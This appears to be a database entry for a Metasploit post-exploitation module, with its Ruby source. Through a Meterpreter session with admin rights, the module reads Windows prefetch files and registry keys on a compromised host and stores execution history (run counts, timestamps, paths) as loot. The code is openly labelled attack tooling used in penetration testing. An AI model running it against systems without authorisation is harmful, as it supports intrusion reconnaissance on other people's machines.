Windows Gather Prefetch File Information

2013-07-16T17:09:21
ID MSF:POST/WINDOWS/GATHER/ENUM_PREFETCH
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems and current values of related registry keys. From each prefetch file we'll collect filetime (converted to utc) of the last execution, file path hash, run count, filename and the execution path.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Registry

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Gather Prefetch File Information',
      'Description'   => %q{
        This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems
        and current values of related registry keys. From each prefetch file we'll collect
        filetime (converted to utc) of the last execution, file path hash, run count, filename
        and the execution path.
      },
      'License'       => MSF_LICENSE,
      'Author'        => ['TJ Glad <tjglad[at]cmail.nu>'],
      'Platform'      => ['win'],
      'SessionType'   => ['meterpreter']
    ))
  end

  def print_prefetch_key_value()
    # Checks if Prefetch registry key exists and what value it has.
    prefetch_key_value = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\\PrefetchParameters", "EnablePrefetcher")
    if prefetch_key_value == 0
      print_error("EnablePrefetcher Value: (0) = Disabled (Non-Default).")
    elsif prefetch_key_value == 1
      print_good("EnablePrefetcher Value: (1) = Application launch prefetching enabled (Non-Default).")
    elsif prefetch_key_value == 2
      print_good("EnablePrefetcher Value: (2) = Boot prefetching enabled (Non-Default, excl. Win2k3).")
    elsif prefetch_key_value == 3
      print_good("EnablePrefetcher Value: (3) = Applaunch and boot enabled (Default Value, excl. Win2k3).")
    else
      print_error("No value or unknown value. Results might vary.")
    end
  end

  def print_timezone_key_values(key_value)
    # Looks for timezone information from registry.
    timezone = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", key_value)
    tz_bias = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", "Bias")
    if timezone.nil? or tz_bias.nil?
      print_line("Couldn't find key/value for timezone from registry.")
    else
      print_good("Remote: Timezone is %s." % timezone)
      if tz_bias < 0xfff
        print_good("Remote: Localtime bias to UTC: -%s minutes." % tz_bias)
      else
        offset = 0xffffffff
        bias = offset - tz_bias
        print_good("Remote: Localtime bias to UTC: +%s minutes." % bias)
      end
    end
  end

  def gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename)
    # Collects the desired information from each prefetch file found
    # from the system.

    prefetch_file = read_file(filename)
    if prefetch_file.blank?
      print_error("Couldn't read file: #{filename}")
      return nil
    else
      # First we extract the saved filename
      pf_filename = prefetch_file[name_offset, 60]
      idx = pf_filename.index("\x00\x00")
      name = Rex::Text.to_ascii(pf_filename.slice(0..idx))

      # Then we get the runcount
      run_count = prefetch_file[runcount_offset, 4].unpack('v')[0]

      # Then the filepath hash
      path_hash = prefetch_file[hash_offset, 4].unpack('h*')[0].upcase.reverse

      # Last we get the latest execution time
      filetime_a = prefetch_file[filetime_offset, 16].unpack('q*')
      filetime = filetime_a[0] + filetime_a[1]
      last_exec = Time.at((filetime - 116444736000000000) / 10000000).utc.to_s

      # This is for reading file paths of the executable from
      # the prefetch file. We'll use this to find out from where the
      # file was executed.

      # First we'll use specific offsets for finding out the location
      # and length of the filepath so that we can find it.
      filepath = []
      fpath_offset = prefetch_file[0x64, 2].unpack('v').first
      fpath_length = prefetch_file[0x68, 2].unpack('v').first
      filepath_data = prefetch_file[fpath_offset, fpath_length]

      # This part will extract the filepath so that we can find and
      # compare its contents to the filename we found previously. This
      # allows us to find the filepath (if it can be found inside the
      # prefetch file) used to execute the program
      # referenced in the prefetch-file.
      unless filepath_data.blank?
        fpath_data_array = filepath_data.split("\\\x00D\x00E\x00V\x00I\x00C\x00E")
        fpath_data_array.each do |path|
          unless path.blank?
            fpath_name = path.split("\\").last.gsub(/\0/, '')
            if fpath_name == name
              filepath << path
            end
          end
        end
      end
    end
    if filepath.blank?
      filepath << "*** Filepath not found ***"
    end

    return [last_exec, path_hash, run_count, name, filepath[0]]
  end

  def run
    print_status("Prefetch Gathering started.")

    # Check to see what Windows Version is running.
    # Needed for offsets.
    # Tested on WinXP, Win2k3 and Win7 systems.
    # http://www.forensicswiki.org/wiki/Prefetch
    # http://www.forensicswiki.org/wiki/Windows_Prefetch_File_Format

    sysnfo = client.sys.config.sysinfo['OS']
    error_msg = "You don't have enough privileges. Try getsystem."

    if sysnfo =~/(Windows XP|2003|.NET)/

      if not is_admin?
        print_error(error_msg)
        return nil
      end

      # Offsets for WinXP & Win2k3
      print_good("Detected #{sysnfo} (max 128 entries)")
      name_offset = 0x10
      hash_offset = 0x4C
      runcount_offset = 0x90
      filetime_offset = 0x78
      # Registry key for timezone
      key_value = "StandardName"

    elsif sysnfo =~/(Windows 7)/
      if not is_admin?
        print_error(error_msg)
        return nil
      end

      # Offsets for Win7
      print_good("Detected #{sysnfo} (max 128 entries)")
      name_offset = 0x10
      hash_offset = 0x4C
      runcount_offset = 0x98
      filetime_offset = 0x78
      # Registry key for timezone
      key_value = "TimeZoneKeyName"
    else
      print_error("No offsets for the target Windows version. Currently works only on WinXP, Win2k3 and Win7.")
      return nil
    end

    table = Rex::Text::Table.new(
      'Header'  => "Prefetch Information",
      'Indent'  => 1,
      'Columns' =>
      [
        "Last execution (filetime)",
        "Run Count",
        "Hash",
        "Filename",
        "Filepath"
      ])

    print_prefetch_key_value
    print_timezone_key_values(key_value)
    print_good("Current UTC Time: %s" % Time.now.utc)
    sys_root = session.sys.config.getenv('SYSTEMROOT')
    full_path = sys_root + "\\Prefetch\\"
    file_type = "*.pf"
    print_status("Gathering information from remote system. This will take awhile..")

    # Goes through the files in Prefetch directory, creates file paths for the
    # gather_pf_info function that enumerates all the pf info

    getfile_prefetch_filenames = client.fs.file.search(full_path, file_type)
    if getfile_prefetch_filenames.empty? or getfile_prefetch_filenames.nil?
      print_error("Could not find/access any .pf files. Can't continue. (Might be temporary error..)")
      return nil
    else
      getfile_prefetch_filenames.each do |file|
        if file.empty? or file.nil?
          next
        else
          filename = ::File.join(file['path'], file['name'])
          pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename)
          if not pf_entry.nil?
            table << pf_entry
          end
        end
      end
    end

    # Stores and prints out results
    results = table.to_s
    loot = store_loot("prefetch_info", "text/plain", session, results, nil, "Prefetch Information")
    print_line("\n" + results + "\n")
    print_status("Finished gathering information from prefetch files.")
    print_status("Results stored in: #{loot}")
  end
end